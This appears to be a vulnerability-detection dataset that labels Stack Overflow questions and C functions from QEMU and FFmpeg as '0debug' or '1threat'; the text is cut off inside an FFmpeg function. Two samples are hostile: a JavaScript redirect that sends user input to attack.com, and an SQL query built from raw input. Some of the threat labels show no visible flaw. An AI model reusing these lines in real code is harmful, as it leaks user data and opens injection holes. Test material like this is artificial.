problem
stringlengths 26
131k
| labels
class label 2
classes |
|---|---|
Send data to another page - html : <p>Hello I wanted to send data from one html page to another </p>
<p>For eg this is my index.html page</p>
<pre><code><html>
<body>
<script>
var uname = "karan"; // I want to send this
</script>
</body>
</html>
</code></pre>
<p>And this is newPage.html:</p>
<pre><code><html>
<body>
<script>
console.log(uname); // I want the uname form index.html
</script>
</body>
</html>
</code></pre>
<p>I have already tried declaring a new class in another javascript file but it gives <code>undefined</code></p>
<p>Is there any way I can do this? Thank you</p>
| 0debug
|
Compare two tables sql server 2012 : If I have two tables ( Grades , Students mark)
grade
StudentId Mark examId
1 10 1
2 9 2
3 15 1
4 26 3
================================
================================
StudentMark
StudentId Mark examid
1 10 1
2 5 2
3 15 1
4 8 3
And I want to compare the data between this two table , and if there different in mark I want to replace the grade(mark) with StudentMark(Mark) using the bulk
How to do that ?
| 0debug
|
window.location.href = 'http://attack.com?user=' + user_input;
| 1threat
|
static void net_socket_send(void *opaque)
{
NetSocketState *s = opaque;
int l, size, err;
uint8_t buf1[4096];
const uint8_t *buf;
size = recv(s->fd, buf1, sizeof(buf1), 0);
if (size < 0) {
err = socket_error();
if (err != EWOULDBLOCK)
goto eoc;
} else if (size == 0) {
eoc:
qemu_set_fd_handler(s->fd, NULL, NULL, NULL);
closesocket(s->fd);
return;
}
buf = buf1;
while (size > 0) {
switch(s->state) {
case 0:
l = 4 - s->index;
if (l > size)
l = size;
memcpy(s->buf + s->index, buf, l);
buf += l;
size -= l;
s->index += l;
if (s->index == 4) {
s->packet_len = ntohl(*(uint32_t *)s->buf);
s->index = 0;
s->state = 1;
}
break;
case 1:
l = s->packet_len - s->index;
if (l > size)
l = size;
memcpy(s->buf + s->index, buf, l);
s->index += l;
buf += l;
size -= l;
if (s->index >= s->packet_len) {
qemu_send_packet(s->vc, s->buf, s->packet_len);
s->index = 0;
s->state = 0;
}
break;
}
}
}
| 1threat
|
how can I do to know how many times the recipient open the email or the number of click? : <p>I'm working on an application in Java EE, one of the features of this application is to send emails using javamail.
I must make reporting on items , how can I do to know how many times the recipient open the email or the number of click?</p>
<p>Thank you in advance for your suggestions</p>
| 0debug
|
static int open_next_file(AVFormatContext *avf)
{
ConcatContext *cat = avf->priv_data;
unsigned fileno = cat->cur_file - cat->files;
if (cat->cur_file->duration == AV_NOPTS_VALUE)
cat->cur_file->duration = cat->avf->duration - (cat->cur_file->file_inpoint - cat->cur_file->file_start_time);
if (++fileno >= cat->nb_files) {
cat->eof = 1;
return AVERROR_EOF;
}
return open_file(avf, fileno);
}
| 1threat
|
Why does `for (var i in null_object)` enter the loop body more than zero times? : I am trying to save and load a Javascript object of the `{'foo':123}` type in localStorage. I have hit a strange behaviour.
localStorage .setItem ('names', null);
alert ("names is:" + localStorage .getItem ('names'));
for (var n in localStorage .getItem ('names'))
{
alert ("#" + n + "#");
}
This gives the following alerts
names is:null
#0#
#1#
#2#
#3#
WTF?
| 0debug
|
static void vfio_map_bar(VFIOPCIDevice *vdev, int nr)
{
VFIOBAR *bar = &vdev->bars[nr];
uint64_t size = bar->region.size;
char name[64];
uint32_t pci_bar;
uint8_t type;
int ret;
if (!size) {
return;
}
snprintf(name, sizeof(name), "VFIO %04x:%02x:%02x.%x BAR %d",
vdev->host.domain, vdev->host.bus, vdev->host.slot,
vdev->host.function, nr);
ret = pread(vdev->vbasedev.fd, &pci_bar, sizeof(pci_bar),
vdev->config_offset + PCI_BASE_ADDRESS_0 + (4 * nr));
if (ret != sizeof(pci_bar)) {
error_report("vfio: Failed to read BAR %d (%m)", nr);
return;
}
pci_bar = le32_to_cpu(pci_bar);
bar->ioport = (pci_bar & PCI_BASE_ADDRESS_SPACE_IO);
bar->mem64 = bar->ioport ? 0 : (pci_bar & PCI_BASE_ADDRESS_MEM_TYPE_64);
type = pci_bar & (bar->ioport ? ~PCI_BASE_ADDRESS_IO_MASK :
~PCI_BASE_ADDRESS_MEM_MASK);
memory_region_init_io(&bar->region.mem, OBJECT(vdev), &vfio_region_ops,
bar, name, size);
pci_register_bar(&vdev->pdev, nr, type, &bar->region.mem);
if (vdev->msix && vdev->msix->table_bar == nr) {
size = vdev->msix->table_offset & qemu_real_host_page_mask;
}
strncat(name, " mmap", sizeof(name) - strlen(name) - 1);
if (vfio_mmap_region(OBJECT(vdev), &bar->region, &bar->region.mem,
&bar->region.mmap_mem, &bar->region.mmap,
size, 0, name)) {
error_report("%s unsupported. Performance may be slow", name);
}
if (vdev->msix && vdev->msix->table_bar == nr) {
uint64_t start;
start = REAL_HOST_PAGE_ALIGN((uint64_t)vdev->msix->table_offset +
(vdev->msix->entries *
PCI_MSIX_ENTRY_SIZE));
size = start < bar->region.size ? bar->region.size - start : 0;
strncat(name, " msix-hi", sizeof(name) - strlen(name) - 1);
if (vfio_mmap_region(OBJECT(vdev), &bar->region, &bar->region.mem,
&vdev->msix->mmap_mem,
&vdev->msix->mmap, size, start, name)) {
error_report("%s unsupported. Performance may be slow", name);
}
}
vfio_bar_quirk_setup(vdev, nr);
}
| 1threat
|
void aio_set_fd_poll(AioContext *ctx, int fd,
IOHandler *io_poll_begin,
IOHandler *io_poll_end)
{
}
| 1threat
|
Inserting a newline near the end of a std::string : <p>I'm struggling with trying to implement a C++ code solution that will allow me to insert a newline (i.e. a string literal <code>'\n'</code>) <em>towards the end</em> of a <code>std::string</code>, and <strong>not</strong> at the very end as most implementations show.</p>
<p>For example, I want to insert a <code>'\n'</code> just <code>-1</code> characters before the very end itself. So if the string was 100 characters long (poor analogy I know), then I'd like to insert the string literal at the 99th character in a clean, easily readable manner.</p>
<p>Thanks!</p>
| 0debug
|
Remove all elements from array that match specific string : <p>What is the easiest way to remove all elements from array that match specific string? For example:</p>
<p><code>array = [1,2,'deleted',4,5,'deleted',6,7];</code></p>
<p>I want to remove all <code>'deleted'</code> from the array.</p>
| 0debug
|
static uint64_t omap_mcbsp_read(void *opaque, target_phys_addr_t addr,
unsigned size)
{
struct omap_mcbsp_s *s = (struct omap_mcbsp_s *) opaque;
int offset = addr & OMAP_MPUI_REG_MASK;
uint16_t ret;
if (size != 2) {
return omap_badwidth_read16(opaque, addr);
}
switch (offset) {
case 0x00:
if (((s->rcr[0] >> 5) & 7) < 3)
return 0x0000;
case 0x02:
if (s->rx_req < 2) {
printf("%s: Rx FIFO underrun\n", __FUNCTION__);
omap_mcbsp_rx_done(s);
} else {
s->tx_req -= 2;
if (s->codec && s->codec->in.len >= 2) {
ret = s->codec->in.fifo[s->codec->in.start ++] << 8;
ret |= s->codec->in.fifo[s->codec->in.start ++];
s->codec->in.len -= 2;
} else
ret = 0x0000;
if (!s->tx_req)
omap_mcbsp_rx_done(s);
return ret;
}
return 0x0000;
case 0x04:
case 0x06:
return 0x0000;
case 0x08:
return s->spcr[1];
case 0x0a:
return s->spcr[0];
case 0x0c:
return s->rcr[1];
case 0x0e:
return s->rcr[0];
case 0x10:
return s->xcr[1];
case 0x12:
return s->xcr[0];
case 0x14:
return s->srgr[1];
case 0x16:
return s->srgr[0];
case 0x18:
return s->mcr[1];
case 0x1a:
return s->mcr[0];
case 0x1c:
return s->rcer[0];
case 0x1e:
return s->rcer[1];
case 0x20:
return s->xcer[0];
case 0x22:
return s->xcer[1];
case 0x24:
return s->pcr;
case 0x26:
return s->rcer[2];
case 0x28:
return s->rcer[3];
case 0x2a:
return s->xcer[2];
case 0x2c:
return s->xcer[3];
case 0x2e:
return s->rcer[4];
case 0x30:
return s->rcer[5];
case 0x32:
return s->xcer[4];
case 0x34:
return s->xcer[5];
case 0x36:
return s->rcer[6];
case 0x38:
return s->rcer[7];
case 0x3a:
return s->xcer[6];
case 0x3c:
return s->xcer[7];
}
OMAP_BAD_REG(addr);
return 0;
}
| 1threat
|
Webpack loaders vs plugins; what's the difference? : <p>What is the difference between loaders and plugins in webpack? </p>
<p>The <a href="https://webpack.github.io/docs/using-plugins.html">documentation for plugins</a> just says:</p>
<blockquote>
<p>Use plugins to add functionality typically related to bundles in webpack.</p>
</blockquote>
<p>I know that babel uses a loader for jsx/es2015 transforms, but it looks like other common tasks (copy-webpack-plugin, for example) use plugins instead.</p>
| 0debug
|
static int mov_read_aclr(MOVContext *c, AVIOContext *pb, MOVAtom atom)
{
int ret = 0;
int length = 0;
uint64_t original_size;
if (c->fc->nb_streams >= 1) {
AVCodecContext *codec = c->fc->streams[c->fc->nb_streams-1]->codec;
if (codec->codec_id == AV_CODEC_ID_H264)
return 0;
if (atom.size == 16) {
original_size = codec->extradata_size;
ret = mov_realloc_extradata(codec, atom);
if (!ret) {
length = mov_read_atom_into_extradata(c, pb, atom, codec, codec->extradata + original_size);
if (length == atom.size) {
const uint8_t range_value = codec->extradata[original_size + 19];
switch (range_value) {
case 1:
codec->color_range = AVCOL_RANGE_MPEG;
break;
case 2:
codec->color_range = AVCOL_RANGE_JPEG;
break;
default:
av_log(c, AV_LOG_WARNING, "ignored unknown aclr value (%d)\n", range_value);
break;
}
av_dlog(c, "color_range: %d\n", codec->color_range);
} else {
av_log(c, AV_LOG_ERROR, "aclr not decoded - incomplete atom\n");
}
} else {
av_log(c, AV_LOG_ERROR, "aclr not decoded - unable to add atom to extradata\n");
}
} else {
av_log(c, AV_LOG_WARNING, "aclr not decoded - unexpected size %"PRId64"\n", atom.size);
}
}
return ret;
}
| 1threat
|
Gradle Sync Failed Android Studio 3.6 : <p>I have just updated the Android Studio from 3.5.3 to 3.6. After this update, I have updated the Gradle and Android SDK Build Tools as well. Now the Gradle sync is failing with these errors:</p>
<pre><code>1. org.gradle.api.internal.artifacts.ivyservice.DefaultLenientConfiguration$ArtifactResolveException:
Could not resolve all artifacts for configuration ':classpath'.
2. org.gradle.internal.resolve.ModuleVersionResolveException: Could not
resolve com.android.tools.build:gradle:3.6.0.
3. org.gradle.internal.resolve.ModuleVersionResolveException: No cached
version of com.android.tools.build:gradle:3.6.0 available for
offline mode.
</code></pre>
<p>Looking at the 3rd error it seems that <strong>Offline Work</strong> option needs to be disabled in Android Studio <strong>Settings -> Build, Execution, Deployment -> Gradle</strong>. But the <strong>Offline Work</strong> check box is no where to be found in the said settings.
Is it the actual problem? If yes, then how it could be disabled in <strong>Android Studio 3.6</strong>? If no, then what is the problem here?</p>
<p>I have already tried <strong>Invalidate Caches / Restart</strong> but it did not help.</p>
| 0debug
|
Function get_dictionary() in R : There's a function called get_dictionary() in R when using fastrtext, and I thought it would return all the words in the dictionary. However, when I set wordNgrams to 2 or 3, it returned exactly the same list of words as what I got when setting wordNgrams to 1. Can someone tell me what's going on here? Thanks!
| 0debug
|
RStudio is slow when loading a project / package in development : <p>I have recently experienced a serious problem with Rstudio when developing a package. Whenever, I open an existing project with Rstudio where versions are controlled with Git, it takes so long for it to respond to any command. It is also impossible to type something in the console (e.g. 1+1) and obtain the result. Even quitting the Rstudio, should be done with task manager. There is no problem when I create a new project / package or when I open directly a R script.</p>
<p>This problem appears both when the project is saved on a dropbox or on a local repository.</p>
<p>To overcome this issue everytime I need to modify my code, I create a new project, and then I move toward the new repository all my current R scripts and the folder ".git".</p>
<p>I would appreciate if anybody could help me with this issue.</p>
| 0debug
|
Hi can I active two network interface on ec2 at a time : I can't active two network interface at a time.both interface have two private ip each total 4 ,all are set to elastic ip
But I can ping only two public IP .
When.How can I activated 4 IP at a time
| 0debug
|
Kotlin: Make an internal function visible for unit tests : <p>In case the tests are in a different module than the production code (which is common), what's the best way to make internal functions visible for tests?</p>
<p>In Java, I would have the production code and the test in the same package and make the methods-to-be-tested package-private (plus, add a <code>@VisibleForTest</code> annotation if the only reason for having it package-private rather than private is the test). Unfortunately, Kotlin doesn't have the concept of package-private.</p>
| 0debug
|
Filtering data with Select (advanced) : <p>I'm on a project and I have 3 possibilities of filters. Filter by name,cities and province. Right now what i'm doing are simple IFs trying to think of all possibilities.</p>
<p>Example : it can be [Name][City][All] or [All][City][province] or [All][All][province] and it goes on in total of 8 to 9 possibilities. That means if have to do about 8 condition in my PHP code trying to catch everything.</p>
<p>So my question is : Is there a way on MySql to do a SELECT data1.. FROM tableName WHERE ... but when I don't give for example the city it search only with the name and the province. </p>
| 0debug
|
i developed the app in android.which was run in lollipop device but crash on kitkat device.i am new to android.Please help me for find the solution? : apply plugin: 'com.android.application'
android {
compileSdkVersion 19
buildToolsVersion '21.1.1'
defaultConfig {
applicationId "com.example.itsoft37.kitkat"
minSdkVersion 11
targetSdkVersion 19
}
buildTypes {
release {
minifyEnabled false
proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.txt'
}
}
}
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
compile 'com.android.support:appcompat-v7:19.1.0'
}
i am new to android.please help me for find the solution
the error shows unfortunately stopped on device..
| 0debug
|
static void rgb24_to_rgb555(AVPicture *dst, AVPicture *src,
int width, int height)
{
const unsigned char *p;
unsigned char *q;
int r, g, b, dst_wrap, src_wrap;
int x, y;
p = src->data[0];
src_wrap = src->linesize[0] - 3 * width;
q = dst->data[0];
dst_wrap = dst->linesize[0] - 2 * width;
for(y=0;y<height;y++) {
for(x=0;x<width;x++) {
r = p[0];
g = p[1];
b = p[2];
((unsigned short *)q)[0] =
((r >> 3) << 10) | ((g >> 3) << 5) | (b >> 3) | 0x8000;
q += 2;
p += 3;
}
p += src_wrap;
q += dst_wrap;
}
}
| 1threat
|
What is the best way to create a class structure from a bill of materials? : <p>For a semester project (in Java) I have to do some material flow optimization. The starting point for the whole task will be a bill of materials. The user should be able to provide it via a file (xml or yaml). My question is now, how can I build class objects (with dependencies) from this bill of materials automatically?</p>
<p>So far I found a serialization/deserialization framework called simple (<a href="http://simple.sourceforge.net/" rel="nofollow noreferrer">http://simple.sourceforge.net/</a>) but I'm not sure if this is the right way to go.</p>
<p>I'm glad for any advice.</p>
| 0debug
|
In angular 2+ how do I communicate between sibling components : <p>I have 3 components I want them to interact with each other.</p>
<p>Tried with services it is not not solving my problem. Need help on it </p>
| 0debug
|
connection.query('SELECT * FROM users WHERE username = ' + input_string)
| 1threat
|
av_cold int sws_init_context(SwsContext *c, SwsFilter *srcFilter,
SwsFilter *dstFilter)
{
int i;
int usesVFilter, usesHFilter;
int unscaled;
SwsFilter dummyFilter = { NULL, NULL, NULL, NULL };
int srcW = c->srcW;
int srcH = c->srcH;
int dstW = c->dstW;
int dstH = c->dstH;
int dst_stride = FFALIGN(dstW * sizeof(int16_t) + 16, 16);
int dst_stride_px = dst_stride >> 1;
int flags, cpu_flags;
enum AVPixelFormat srcFormat = c->srcFormat;
enum AVPixelFormat dstFormat = c->dstFormat;
const AVPixFmtDescriptor *desc_src = av_pix_fmt_desc_get(srcFormat);
const AVPixFmtDescriptor *desc_dst = av_pix_fmt_desc_get(dstFormat);
cpu_flags = av_get_cpu_flags();
flags = c->flags;
emms_c();
if (!rgb15to16)
ff_rgb2rgb_init();
unscaled = (srcW == dstW && srcH == dstH);
if (!(unscaled && sws_isSupportedEndiannessConversion(srcFormat) &&
av_pix_fmt_swap_endianness(srcFormat) == dstFormat)) {
if (!sws_isSupportedInput(srcFormat)) {
av_log(c, AV_LOG_ERROR, "%s is not supported as input pixel format\n",
sws_format_name(srcFormat));
return AVERROR(EINVAL);
}
if (!sws_isSupportedOutput(dstFormat)) {
av_log(c, AV_LOG_ERROR, "%s is not supported as output pixel format\n",
sws_format_name(dstFormat));
return AVERROR(EINVAL);
}
}
i = flags & (SWS_POINT |
SWS_AREA |
SWS_BILINEAR |
SWS_FAST_BILINEAR |
SWS_BICUBIC |
SWS_X |
SWS_GAUSS |
SWS_LANCZOS |
SWS_SINC |
SWS_SPLINE |
SWS_BICUBLIN);
if (!i) {
if (dstW < srcW && dstH < srcH)
flags |= SWS_GAUSS;
else if (dstW > srcW && dstH > srcH)
flags |= SWS_SINC;
else
flags |= SWS_LANCZOS;
c->flags = flags;
} else if (i & (i - 1)) {
av_log(c, AV_LOG_ERROR,
"Exactly one scaler algorithm must be chosen\n");
return AVERROR(EINVAL);
}
if (srcW < 4 || srcH < 1 || dstW < 8 || dstH < 1) {
av_log(c, AV_LOG_ERROR, "%dx%d -> %dx%d is invalid scaling dimension\n",
srcW, srcH, dstW, dstH);
return AVERROR(EINVAL);
}
if (!dstFilter)
dstFilter = &dummyFilter;
if (!srcFilter)
srcFilter = &dummyFilter;
c->lumXInc = (((int64_t)srcW << 16) + (dstW >> 1)) / dstW;
c->lumYInc = (((int64_t)srcH << 16) + (dstH >> 1)) / dstH;
c->dstFormatBpp = av_get_bits_per_pixel(desc_dst);
c->srcFormatBpp = av_get_bits_per_pixel(desc_src);
c->vRounder = 4 * 0x0001000100010001ULL;
usesVFilter = (srcFilter->lumV && srcFilter->lumV->length > 1) ||
(srcFilter->chrV && srcFilter->chrV->length > 1) ||
(dstFilter->lumV && dstFilter->lumV->length > 1) ||
(dstFilter->chrV && dstFilter->chrV->length > 1);
usesHFilter = (srcFilter->lumH && srcFilter->lumH->length > 1) ||
(srcFilter->chrH && srcFilter->chrH->length > 1) ||
(dstFilter->lumH && dstFilter->lumH->length > 1) ||
(dstFilter->chrH && dstFilter->chrH->length > 1);
getSubSampleFactors(&c->chrSrcHSubSample, &c->chrSrcVSubSample, srcFormat);
getSubSampleFactors(&c->chrDstHSubSample, &c->chrDstVSubSample, dstFormat);
if (isPlanarRGB(dstFormat)) {
if (!(flags & SWS_FULL_CHR_H_INT)) {
av_log(c, AV_LOG_DEBUG,
"%s output is not supported with half chroma resolution, switching to full\n",
av_get_pix_fmt_name(dstFormat));
flags |= SWS_FULL_CHR_H_INT;
c->flags = flags;
}
}
if (flags & SWS_FULL_CHR_H_INT &&
isAnyRGB(dstFormat) &&
!isPlanarRGB(dstFormat) &&
dstFormat != AV_PIX_FMT_RGBA &&
dstFormat != AV_PIX_FMT_ARGB &&
dstFormat != AV_PIX_FMT_BGRA &&
dstFormat != AV_PIX_FMT_ABGR &&
dstFormat != AV_PIX_FMT_RGB24 &&
dstFormat != AV_PIX_FMT_BGR24) {
av_log(c, AV_LOG_ERROR,
"full chroma interpolation for destination format '%s' not yet implemented\n",
sws_format_name(dstFormat));
flags &= ~SWS_FULL_CHR_H_INT;
c->flags = flags;
}
if (isAnyRGB(dstFormat) && !(flags & SWS_FULL_CHR_H_INT))
c->chrDstHSubSample = 1;
c->vChrDrop = (flags & SWS_SRC_V_CHR_DROP_MASK) >>
SWS_SRC_V_CHR_DROP_SHIFT;
c->chrSrcVSubSample += c->vChrDrop;
if (isAnyRGB(srcFormat) && !(flags & SWS_FULL_CHR_H_INP) &&
srcFormat != AV_PIX_FMT_RGB8 && srcFormat != AV_PIX_FMT_BGR8 &&
srcFormat != AV_PIX_FMT_RGB4 && srcFormat != AV_PIX_FMT_BGR4 &&
srcFormat != AV_PIX_FMT_RGB4_BYTE && srcFormat != AV_PIX_FMT_BGR4_BYTE &&
srcFormat != AV_PIX_FMT_GBRP9BE && srcFormat != AV_PIX_FMT_GBRP9LE &&
srcFormat != AV_PIX_FMT_GBRP10BE && srcFormat != AV_PIX_FMT_GBRP10LE &&
srcFormat != AV_PIX_FMT_GBRAP10BE && srcFormat != AV_PIX_FMT_GBRAP10LE &&
srcFormat != AV_PIX_FMT_GBRP12BE && srcFormat != AV_PIX_FMT_GBRP12LE &&
srcFormat != AV_PIX_FMT_GBRP16BE && srcFormat != AV_PIX_FMT_GBRP16LE &&
((dstW >> c->chrDstHSubSample) <= (srcW >> 1) ||
(flags & SWS_FAST_BILINEAR)))
c->chrSrcHSubSample = 1;
c->chrSrcW = AV_CEIL_RSHIFT(srcW, c->chrSrcHSubSample);
c->chrSrcH = AV_CEIL_RSHIFT(srcH, c->chrSrcVSubSample);
c->chrDstW = AV_CEIL_RSHIFT(dstW, c->chrDstHSubSample);
c->chrDstH = AV_CEIL_RSHIFT(dstH, c->chrDstVSubSample);
if (unscaled && !usesHFilter && !usesVFilter &&
(c->srcRange == c->dstRange || isAnyRGB(dstFormat))) {
ff_get_unscaled_swscale(c);
if (c->swscale) {
if (flags & SWS_PRINT_INFO)
av_log(c, AV_LOG_INFO,
"using unscaled %s -> %s special converter\n",
sws_format_name(srcFormat), sws_format_name(dstFormat));
return 0;
}
}
c->srcBpc = desc_src->comp[0].depth;
if (c->srcBpc < 8)
c->srcBpc = 8;
c->dstBpc = desc_dst->comp[0].depth;
if (c->dstBpc < 8)
c->dstBpc = 8;
if (c->dstBpc == 16)
dst_stride <<= 1;
FF_ALLOC_OR_GOTO(c, c->formatConvBuffer,
(FFALIGN(srcW, 16) * 2 * FFALIGN(c->srcBpc, 8) >> 3) + 16,
fail);
if (INLINE_MMXEXT(cpu_flags) && c->srcBpc == 8 && c->dstBpc <= 12) {
c->canMMXEXTBeUsed = (dstW >= srcW && (dstW & 31) == 0 &&
(srcW & 15) == 0) ? 1 : 0;
if (!c->canMMXEXTBeUsed && dstW >= srcW && (srcW & 15) == 0
&& (flags & SWS_FAST_BILINEAR)) {
if (flags & SWS_PRINT_INFO)
av_log(c, AV_LOG_INFO,
"output width is not a multiple of 32 -> no MMXEXT scaler\n");
}
if (usesHFilter)
c->canMMXEXTBeUsed = 0;
} else
c->canMMXEXTBeUsed = 0;
c->chrXInc = (((int64_t)c->chrSrcW << 16) + (c->chrDstW >> 1)) / c->chrDstW;
c->chrYInc = (((int64_t)c->chrSrcH << 16) + (c->chrDstH >> 1)) / c->chrDstH;
if (flags & SWS_FAST_BILINEAR) {
if (c->canMMXEXTBeUsed) {
c->lumXInc += 20;
c->chrXInc += 20;
}
else if (INLINE_MMX(cpu_flags)) {
c->lumXInc = ((int64_t)(srcW - 2) << 16) / (dstW - 2) - 20;
c->chrXInc = ((int64_t)(c->chrSrcW - 2) << 16) / (c->chrDstW - 2) - 20;
}
}
#define USE_MMAP (HAVE_MMAP && HAVE_MPROTECT && defined MAP_ANONYMOUS)
{
#if HAVE_MMXEXT_INLINE
if (c->canMMXEXTBeUsed && (flags & SWS_FAST_BILINEAR)) {
c->lumMmxextFilterCodeSize = init_hscaler_mmxext(dstW, c->lumXInc, NULL,
NULL, NULL, 8);
c->chrMmxextFilterCodeSize = init_hscaler_mmxext(c->chrDstW, c->chrXInc,
NULL, NULL, NULL, 4);
#if USE_MMAP
c->lumMmxextFilterCode = mmap(NULL, c->lumMmxextFilterCodeSize,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
c->chrMmxextFilterCode = mmap(NULL, c->chrMmxextFilterCodeSize,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
#elif HAVE_VIRTUALALLOC
c->lumMmxextFilterCode = VirtualAlloc(NULL,
c->lumMmxextFilterCodeSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
c->chrMmxextFilterCode = VirtualAlloc(NULL,
c->chrMmxextFilterCodeSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
#else
c->lumMmxextFilterCode = av_malloc(c->lumMmxextFilterCodeSize);
c->chrMmxextFilterCode = av_malloc(c->chrMmxextFilterCodeSize);
#endif
if (!c->lumMmxextFilterCode || !c->chrMmxextFilterCode)
return AVERROR(ENOMEM);
FF_ALLOCZ_OR_GOTO(c, c->hLumFilter, (dstW / 8 + 8) * sizeof(int16_t), fail);
FF_ALLOCZ_OR_GOTO(c, c->hChrFilter, (c->chrDstW / 4 + 8) * sizeof(int16_t), fail);
FF_ALLOCZ_OR_GOTO(c, c->hLumFilterPos, (dstW / 2 / 8 + 8) * sizeof(int32_t), fail);
FF_ALLOCZ_OR_GOTO(c, c->hChrFilterPos, (c->chrDstW / 2 / 4 + 8) * sizeof(int32_t), fail);
init_hscaler_mmxext(dstW, c->lumXInc, c->lumMmxextFilterCode,
c->hLumFilter, c->hLumFilterPos, 8);
init_hscaler_mmxext(c->chrDstW, c->chrXInc, c->chrMmxextFilterCode,
c->hChrFilter, c->hChrFilterPos, 4);
#if USE_MMAP
mprotect(c->lumMmxextFilterCode, c->lumMmxextFilterCodeSize, PROT_EXEC | PROT_READ);
mprotect(c->chrMmxextFilterCode, c->chrMmxextFilterCodeSize, PROT_EXEC | PROT_READ);
#endif
} else
#endif
{
const int filterAlign = X86_MMX(cpu_flags) ? 4 :
PPC_ALTIVEC(cpu_flags) ? 8 : 1;
if (initFilter(&c->hLumFilter, &c->hLumFilterPos,
&c->hLumFilterSize, c->lumXInc,
srcW, dstW, filterAlign, 1 << 14,
(flags & SWS_BICUBLIN) ? (flags | SWS_BICUBIC) : flags,
cpu_flags, srcFilter->lumH, dstFilter->lumH,
c->param, 1) < 0)
goto fail;
if (initFilter(&c->hChrFilter, &c->hChrFilterPos,
&c->hChrFilterSize, c->chrXInc,
c->chrSrcW, c->chrDstW, filterAlign, 1 << 14,
(flags & SWS_BICUBLIN) ? (flags | SWS_BILINEAR) : flags,
cpu_flags, srcFilter->chrH, dstFilter->chrH,
c->param, 1) < 0)
goto fail;
}
}
{
const int filterAlign = X86_MMX(cpu_flags) ? 2 :
PPC_ALTIVEC(cpu_flags) ? 8 : 1;
if (initFilter(&c->vLumFilter, &c->vLumFilterPos, &c->vLumFilterSize,
c->lumYInc, srcH, dstH, filterAlign, (1 << 12),
(flags & SWS_BICUBLIN) ? (flags | SWS_BICUBIC) : flags,
cpu_flags, srcFilter->lumV, dstFilter->lumV,
c->param, 0) < 0)
goto fail;
if (initFilter(&c->vChrFilter, &c->vChrFilterPos, &c->vChrFilterSize,
c->chrYInc, c->chrSrcH, c->chrDstH,
filterAlign, (1 << 12),
(flags & SWS_BICUBLIN) ? (flags | SWS_BILINEAR) : flags,
cpu_flags, srcFilter->chrV, dstFilter->chrV,
c->param, 0) < 0)
goto fail;
#if HAVE_ALTIVEC
FF_ALLOC_OR_GOTO(c, c->vYCoeffsBank, sizeof(vector signed short) * c->vLumFilterSize * c->dstH, fail);
FF_ALLOC_OR_GOTO(c, c->vCCoeffsBank, sizeof(vector signed short) * c->vChrFilterSize * c->chrDstH, fail);
for (i = 0; i < c->vLumFilterSize * c->dstH; i++) {
int j;
short *p = (short *)&c->vYCoeffsBank[i];
for (j = 0; j < 8; j++)
p[j] = c->vLumFilter[i];
}
for (i = 0; i < c->vChrFilterSize * c->chrDstH; i++) {
int j;
short *p = (short *)&c->vCCoeffsBank[i];
for (j = 0; j < 8; j++)
p[j] = c->vChrFilter[i];
}
#endif
}
c->vLumBufSize = c->vLumFilterSize;
c->vChrBufSize = c->vChrFilterSize;
for (i = 0; i < dstH; i++) {
int chrI = (int64_t)i * c->chrDstH / dstH;
int nextSlice = FFMAX(c->vLumFilterPos[i] + c->vLumFilterSize - 1,
((c->vChrFilterPos[chrI] + c->vChrFilterSize - 1)
<< c->chrSrcVSubSample));
nextSlice >>= c->chrSrcVSubSample;
nextSlice <<= c->chrSrcVSubSample;
if (c->vLumFilterPos[i] + c->vLumBufSize < nextSlice)
c->vLumBufSize = nextSlice - c->vLumFilterPos[i];
if (c->vChrFilterPos[chrI] + c->vChrBufSize <
(nextSlice >> c->chrSrcVSubSample))
c->vChrBufSize = (nextSlice >> c->chrSrcVSubSample) -
c->vChrFilterPos[chrI];
}
FF_ALLOC_OR_GOTO(c, c->lumPixBuf, c->vLumBufSize * 3 * sizeof(int16_t *), fail);
FF_ALLOC_OR_GOTO(c, c->chrUPixBuf, c->vChrBufSize * 3 * sizeof(int16_t *), fail);
FF_ALLOC_OR_GOTO(c, c->chrVPixBuf, c->vChrBufSize * 3 * sizeof(int16_t *), fail);
if (CONFIG_SWSCALE_ALPHA && isALPHA(c->srcFormat) && isALPHA(c->dstFormat))
FF_ALLOCZ_OR_GOTO(c, c->alpPixBuf, c->vLumBufSize * 3 * sizeof(int16_t *), fail);
for (i = 0; i < c->vLumBufSize; i++) {
FF_ALLOCZ_OR_GOTO(c, c->lumPixBuf[i + c->vLumBufSize],
dst_stride + 16, fail);
c->lumPixBuf[i] = c->lumPixBuf[i + c->vLumBufSize];
}
c->uv_off_px = dst_stride_px + 64 / (c->dstBpc & ~7);
c->uv_off_byte = dst_stride + 16;
for (i = 0; i < c->vChrBufSize; i++) {
FF_ALLOC_OR_GOTO(c, c->chrUPixBuf[i + c->vChrBufSize],
dst_stride * 2 + 32, fail);
c->chrUPixBuf[i] = c->chrUPixBuf[i + c->vChrBufSize];
c->chrVPixBuf[i] = c->chrVPixBuf[i + c->vChrBufSize]
= c->chrUPixBuf[i] + (dst_stride >> 1) + 8;
}
if (CONFIG_SWSCALE_ALPHA && c->alpPixBuf)
for (i = 0; i < c->vLumBufSize; i++) {
FF_ALLOCZ_OR_GOTO(c, c->alpPixBuf[i + c->vLumBufSize],
dst_stride + 16, fail);
c->alpPixBuf[i] = c->alpPixBuf[i + c->vLumBufSize];
}
for (i = 0; i < c->vChrBufSize; i++)
memset(c->chrUPixBuf[i], 64, dst_stride * 2 + 1);
assert(c->chrDstH <= dstH);
if (flags & SWS_PRINT_INFO) {
if (flags & SWS_FAST_BILINEAR)
av_log(c, AV_LOG_INFO, "FAST_BILINEAR scaler, ");
else if (flags & SWS_BILINEAR)
av_log(c, AV_LOG_INFO, "BILINEAR scaler, ");
else if (flags & SWS_BICUBIC)
av_log(c, AV_LOG_INFO, "BICUBIC scaler, ");
else if (flags & SWS_X)
av_log(c, AV_LOG_INFO, "Experimental scaler, ");
else if (flags & SWS_POINT)
av_log(c, AV_LOG_INFO, "Nearest Neighbor / POINT scaler, ");
else if (flags & SWS_AREA)
av_log(c, AV_LOG_INFO, "Area Averaging scaler, ");
else if (flags & SWS_BICUBLIN)
av_log(c, AV_LOG_INFO, "luma BICUBIC / chroma BILINEAR scaler, ");
else if (flags & SWS_GAUSS)
av_log(c, AV_LOG_INFO, "Gaussian scaler, ");
else if (flags & SWS_SINC)
